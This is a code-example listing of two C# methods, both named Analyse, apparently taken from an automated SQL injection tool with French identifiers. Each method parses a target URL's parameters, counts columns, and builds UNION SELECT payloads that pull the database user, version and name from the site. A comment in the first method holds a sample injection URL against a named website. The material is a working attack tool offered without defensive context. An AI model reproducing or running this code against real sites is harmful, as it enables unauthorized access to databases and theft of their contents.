示例#1
0
        /*
         * //EXCEPTION
         *  http://www.eatmybrains.com/showreview.php?id=999999.9 union all select [t],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
         *
         *
         */
        public void Analyse(string url)
        {
            form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
            {
                form.txt_statut_analyse.Text = "Analyse: " + url + Environment.NewLine;
            }));
            checked
            {
                HttpRequete  hr             = new HttpRequete();
                sqli_check   vrf            = new sqli_check();
                sqli_colonne colonne        = new sqli_colonne();
                string       url_inj_point  = string.Empty;
                string       inj_point_curr = string.Empty;
                bool         point_trv      = false;
                _url_originale = url;
                _url_base      = url.Split('?')[0];
                _param         = ch.analyseParam(url);

                bool[] ok = new bool[2];
                ok[0] = vrf.demmareAnalyseFast(url);
                ok[1] = vrf.demmareAnalyseAvanced(url);
                if (ok[0] || ok[1])
                {
                    int u = 0; //Union Style 1
                    while (!point_trv && u < _union.Count)
                    {
                        _nbr_colonne = colonne.Compter(_param, _url_base, _union[u]);
                        onFait((u + 1).ToString());
                        for (int p = 0; p < _param.Count; p++)
                        {
                            _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);

                            url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);

                            inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));

                            string page = hr.get(inj_point_curr);
                            if (page.Contains(separateur) || page.Contains(s_separateur))
                            {
                                setResult(page, url_inj_point);
                                point_trv = true;
                                break;
                            }
                        }
                        u++;
                    }
                }
                else
                {
                    form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
                    {
                        form.txt_statut_analyse.Text = "Injection char echouer :( ";
                    }));
                }
            }
        }
示例#2
0
        public string Analyse(string url)
        {
            checked
            {
                HttpRequete  hr             = new HttpRequete();
                sqli_check   vrf            = new sqli_check();
                sqli_colonne colonne        = new sqli_colonne();
                string       url_inj_point  = string.Empty;
                string       inj_point_curr = string.Empty;
                bool         point_trv      = false;
                _url_originale = url;
                _url_base      = url.Split('?')[0];
                _param         = ch.analyseParam(url);

                int u = 0; //Union Style 1
                while (!point_trv && u < _unionStyle.Count)
                {
                    _nbr_colonne = colonne.Compter(_param, _url_base, _unionStyle[u]);
                    for (int p = 0; p < _param.Count; p++)
                    {
                        _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);

                        url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);

                        inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));

                        string page = hr.get(inj_point_curr);
                        if (page.Contains(separateur) || page.Contains(s_separateur))
                        {
                            return(url_inj_point);
                        }
                    }
                    u++;
                }
                return("False");
            }
        }